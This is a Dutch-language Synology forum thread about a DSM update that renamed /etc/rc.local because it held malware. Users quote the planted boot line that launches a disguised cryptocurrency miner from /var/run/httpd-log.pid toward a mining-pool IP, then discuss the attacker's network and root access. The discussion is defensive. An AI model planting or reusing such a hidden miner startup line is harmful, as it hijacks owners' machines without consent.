Auteur Topic: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware  (gelezen 12311 keer)

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #15 Gepost op: 24 oktober 2014, 12:32:14 »
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.

In een draadje ergens hierboven zegt JSSL

Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

/var/run/httpd-log.pid is een verwijzing naar Miner software.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1342
  • -Ontvangen: 7811
  • Berichten: 43.227
  • FIFO / LIFO
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #16 Gepost op: 24 oktober 2014, 12:38:58 »
Overheen gekeken dus...  :oops:
DAT is inderdaad een zeer goede reden voor DSM om die te renamen.  8)


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.3-25426-2   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.1-69057-5
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 6.2.4-25556-7   RT2600ac  SRM 1.2.5-8227-11
BeeDrive   1TB             BeeServer  BSM 1.0-65162                                                                 MR2200ac  SRM 1.2.5-8227-11

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #17 Gepost op: 24 oktober 2014, 12:43:37 »
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.

Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.

Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.

Offline Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 177
  • -Ontvangen: 2630
  • Berichten: 16.289
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #18 Gepost op: 24 oktober 2014, 12:57:15 »
ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.

Misschien niet ongebruikelijk, maar bij TS staat er:
Citaat
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

En vooral de link naar: 93.174.95.67 is verdacht. En als ik dat IP bekijk, dan behoort hij tot :"Ecatel Ltd, P.o.box 19533, 2500 Cm Den Haag, Netherlands"

Ik weet niet wat dat voor firma is, maar van de laatste 5 SSH aanvallen op mijn NAS kwamen er 3 vanaf een IP adres dat tot Ecatel behoort. (Ik heb al 3 IP reeksen van die firma geblokkeerd).
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR
  • Extra's: DS212J, RT1900ac

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #19 Gepost op: 24 oktober 2014, 13:02:02 »
Ben nu wel nieuwsgierig wat hij zou doen als er zowel een bitcone miner als een optware startup in rc.local zou staan.

Overigens blijf ik erbij dat derde partijen niets te zoeken hebben in rc.local
Als je daar iets kunt opstarten zit je heel vroeg in het bootproces en heb je veel te veel mogelijkheden om nare dingen uit te halen.

Is tegenwoordig helemaal niet meer nodig sinds Synology actief het gebruik van externe package ondersteund.


Als een check wordt gedaan op de aanwezigheid van de string httpd-log.pid in het bestand, wordt de rc.local aan de kant gezet, ongeacht wat er verder nog in staat, want zo belangrijk is dat bestand verder niet.

Ik vind je overweging m.b.t. wel of niet rc.local op een Syno eerlijk gezegd verder niet zo spannend.
Ik maak me er meer zorgen over dat een externe partij in staat is om root te krijgen op een Syno systeem, want dan kan je overal en altijd grapjes uithalen, niet alleen in de /etc/rc.local.



kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #20 Gepost op: 24 oktober 2014, 13:03:51 »

ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is.

Niet ongebruikelijk, maar bij TS staat er:
Citaat
/var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

ja Briolet, dat had ik gezien.  :idea:

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #21 Gepost op: 24 oktober 2014, 13:11:36 »
@Birdy, zie de 3e post van dit topic. ;)
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb


 

Update 3

Gestart door RobloxBoard Auto-Sub

Reacties: 2
Gelezen: 1679
Laatste bericht 23 januari 2016, 11:49:30
door Roblox
SRM 1.0.3 - 6030 update

Gestart door GfSBoard Synology Router

Reacties: 4
Gelezen: 2336
Laatste bericht 01 april 2016, 19:54:22
door Stephan296
Timebackup na Update 3.1

Gestart door FranckeMBoard Time Backup

Reacties: 1
Gelezen: 5860
Laatste bericht 03 maart 2011, 06:52:04
door henkg
VERPLAATST: photo station functioneert niet meer na update dsm 7

Gestart door BirdyBoard Synology DSM 7.0

Reacties: 0
Gelezen: 583
Laatste bericht 05 oktober 2021, 23:47:50
door Birdy
DSM Version: 7.1-42661 Update 2

Gestart door HofstedeBoard Synology DSM 7.1

Reacties: 32
Gelezen: 4142
Laatste bericht 23 juni 2022, 11:57:35
door Birdy